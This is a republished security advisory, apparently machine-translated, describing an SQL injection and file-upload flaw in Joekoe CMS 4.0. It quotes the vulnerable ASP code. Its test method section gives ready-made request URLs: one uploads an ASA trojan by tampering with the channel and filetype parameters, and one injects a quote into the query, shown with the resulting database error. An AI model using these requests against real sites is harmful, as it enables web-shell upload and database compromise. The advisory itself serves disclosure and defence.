Joekoe CMS 4.0 Injection Vulnerability

Source: Internet
Author: User
Tags fast web
Affected Versions:
Joekoe CMS 4.0.
Detailed description:
Joekoe CMS 4.0 brings you a well-designed, unique and innovative system for member interaction and security, the best solution for a web site or business platform in a Windows NT service environment. Its well-designed architecture and function mechanism provide you with a secure, stable, efficient, and fast web site and integrated business platform solution from individual to enterprise application requirements.
In web. Upload. asp:

...........
Sub doparseuploaddata ()
Dim tmpfilepath, tmpfiletype, tmpfilesize, tmpname
Tmpfilepath = up. getfileinfo ("file. Path ")
Tmpfiletype = up. getfileinfo ("filetype ")
Tmpfilesize = opscommon. toint (up. getfileinfo ("filesize "))
Tmpname = up. getfileinfo ("name ")
Dim tmpchannel, tmpdataid, tmptype, tmpsql, tmpid
Tmpchannel = upconfig. Channel
Tmpdataid = 0
Tmptype = 0
Select case upconfig. Channel
Case "user. Face"
Tmpdataid = upconfig. userid
Tmpchannel = "face"
Tmptype = 1
Tmpsql = "select top 1 u_id from db_sys_upload where

Nsort = '"& tmpchannel &"' and IID = "& tmpdataid &""
Case "blog. logo"
Tmpdataid = toint (Ops. Client. getsession ("user. blogid "))
If tmpdataid <1 then tmpdataid = upconfig. userid
Tmpchannel = "blog"
Tmptype = 1
Tmpsql = "select top 1 u_id from db_sys_upload where

Nsort = '"& tmpchannel &"' and IID = "& tmpdataid &""
Case else
Tmpsql = "select top 1 u_id from db_sys_upload where

U_url = '"& tmpfilepath &"'"
End select
..........
Read this tmpsql = "select top 1 u_id from db_sys_upload where u_url = '" & tmpfilepath & "'". u_url comes from & tmpfilepath &, while & tmpfilepath & comes from up. getfileinfo ("file. path.

Refer:
Great Chan
Http://blog.gsnsg.com/weblog/usual/
Solution:
Http://www.joekoe.com/
Test method:

[Warning]

The following procedures (methods) may be offensive and are only for security research and teaching. You are at your own risk!

1. upload Vulnerability: this vulnerability can be exploited to change the channel variable as long as it is not equal to forum or user. face, blog. you just need the logo, and then change filetype to Asa to upload the trojan. The specific URL can be the common/upload. asp? Channel = use & filetype = ASA & filename = & fileinput = u_face & formname = & thumbname = & thumbinput =, and then upload

2. SQL injection vulnerability: Add statements such as common/upload. asp to channel variables? Channel = use '& filetype = GIF & filename = & fileinput = u_face & formname = & thumbname = & thumbinput =

Joekoe CMS 4.0.
Error message:

Select top 1 u_id from db_sys_upload where

U_url = 'user'/20070722031234c.gif'
Original error:
Error #-2147217900, row 1st: There is a syntax error near 'C. Microsoft OLE DB

Provider for SQL Server
Back to homepage
Processed in 0.188 s, 1 queries, 54 cache.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.